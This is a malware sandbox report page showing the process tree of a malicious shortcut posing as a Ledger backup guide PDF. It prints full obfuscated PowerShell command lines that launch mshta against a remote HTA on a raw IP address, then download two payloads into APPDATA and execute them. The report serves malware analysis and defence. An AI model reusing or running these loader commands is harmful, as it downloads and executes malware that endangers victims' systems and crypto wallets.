popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "YOJrRVJtLJap" "C:\Users\test22\AppData\Local\Temp\Ledger Backup Guide.pdf.lnk"

    2560

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $g='s:aLh43vArH20fMw6p917T/5.t'; &(-join($g[(996-996),(689-687),(-418+421)])) ~= (-join($g[(996-996),(689-687),(-418+421)])); ~= ^[ (-join($g[(294-280),(996-996),(725-721),(507-486),(689-687)])); foreach($n in @((386-382),(-941+966),(-367+392),(-106+123),(182-181),(979-957),(-369+391),(219-201),(-305+310),(-665+689),(-104+123),(-842+865),(-848+853),(792-768),(-440+459),(894-874),(407-396),(223-199),(-875+894),(575-559),(999-983),(217-195),(889-880),(-550+565),(220-211),(363-356),(716-694),(975-969),(-94+106),(-924+936),(699-679),(-806+819),(785-761),(-599+603),(1005-980),(-774+776))){$O+=$g[$n]}; ^[ $O;

      2672

      • mshta.exe "C:\Windows\system32\mshta.exe" http://94.154.172.166/rwrv/3007f.hta

        2808

        • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDRGgw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,21095,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLtIzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,21088,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MUUDRGgw = $OKwmuBS.DownloadData($HftxTOL);return $MUUDRGgw};function hSqAuyRUp($Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[char]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:APPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,21045,21034,21034,21106,21106,21106,21033,21096,21088,21087,21092,21084,21089,21092,21101,21088,21033,21086,21098,21096,21034,21089,21092,21095,21088,21082,21099,21101,21088,21096,21092,21104,21096,21034,21099,21038,21106,21101,21036,21094,21038,21041,21092,21106,21089,21093,21095,21042,21108,21034,21053,21084,21086,21094,21104,21099,21082,21058,21104,21092,21087,21088,21033,21099,21087,21089,21034,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjhd;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21045,21034,21034,21044,21039,21033,21036,21040,21039,21033,21036,21042,21037,21033,21036,21041,21041,21034,21101,21106,21101,21105,21034,21037,21038,21033,21088,21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $qXEYnMFd;;;}WVzMbSyaK;

          2948

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf